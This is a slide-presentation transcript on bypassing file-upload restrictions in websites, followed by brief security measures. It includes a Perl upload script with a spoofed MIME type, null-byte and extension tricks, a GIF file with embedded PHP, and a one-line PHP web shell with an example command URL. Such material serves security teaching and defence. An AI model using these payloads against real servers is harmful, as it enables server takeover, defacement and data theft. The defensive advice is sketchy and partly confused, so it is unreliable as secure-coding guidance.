bypass file upload restrictions
DESCRIPTION
Bypass file upload restrictionsTRANSCRIPT
BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES
AND SECURITY MEASURES
By K. Subramanian K. R. Mukesh
File upload
• Necessity• Social networking websites, blogs, File sharing,
etc.• Web developers do not consider the threats• Files should be sanitized • If not, leads to local file inclusion and hacking• Filtering mechanisms
Methods of filtering
Content-Type verification
• HTTP POST – MIME typeContent-Disposition: form-data;
name="uploaded file []";filename="18.jpg"\r\n Content-Type : image/jpeg\r\n\r <file content>
• To bypass this filter, edit the Content-Type to an applicable one.
#!/usr/bin/perl#use LWP;use HTTP::Request::Common;$ua = $ua = LWP::UserAgent->new;;$req = $ua->request(POST'http://example.com/upload.PHP',Content_Type => 'form-data',Content => [userfile => ["sh.PHP", "sh.PHP","Content-Type" =>"application/pdf"],],);print $req->as_string();
An easy way – Tamper data
• Tamper data – Mozilla add-on allows to modify the POST data before submit
Filename extension verification
• Check the extension of the file• Filter out malicious extensions
$blacklist = array(".php", ".phtml", ".php3", ".php4");
• To bypass this, use NULL BYTES in filenamesh.php%00.pdf
(or)sh.asp;xx.pdf
• While uploading, extension is .pdf• When accessed, delivered to PHP interpreter
File content verification
• Applicable to image files• $imageinfo =getimagesize($_FILES['userfile']['tmp_name']);
• To bypass this, manually craft an image file with an embedded PHP code
Content-Type: image/gifGIF89a(...some binary data...)<?PHP
System($_GET[‘command’]);?>(....binary data…)
• PHP interpreter execute the php code inside a garbage of binary values
A Simple Demonstration
Towards Bypassing these Filters
Worst case scenario
• Local file inclusion – PHP shell upload• Simple PHP shell:
<?php System ($_GET [‘command’]);?>
• Executes commands on remote serverwww.example.com/uploads/sh.php?command=‘ifconfig’
• Entire control of the server – rooting it• Defacements, database access, credential
information theft, etc.
Security Measures
• Preventing direct access to the uploaded files$uploaddir = '/var/spool/uploads/';
# Outside of root
• Block web access using .htaccess fileIndexIgnore */*
• Overhead to read and write• Sometimes leads to potential directory
traversal attacks
Random file name implementation
• Prevents attacker knowing the name of the file uploaded
• Map the names in the database$res = $db->query("INSERT INTO uploads SET name=?,original_name=?”)
• Query while reading• A little overhead, but secure• Think again, leads to SQL injection
Conclusion
• Complicated to implement a secure file upload facility
• Many filters = slow response. Leads to Denial Of Service (DOS) attacks
• Best way is to maintain UPLOAD LOGS containing user info like ip address, helpful to trace an attacker
• Secure coding practices
Thank you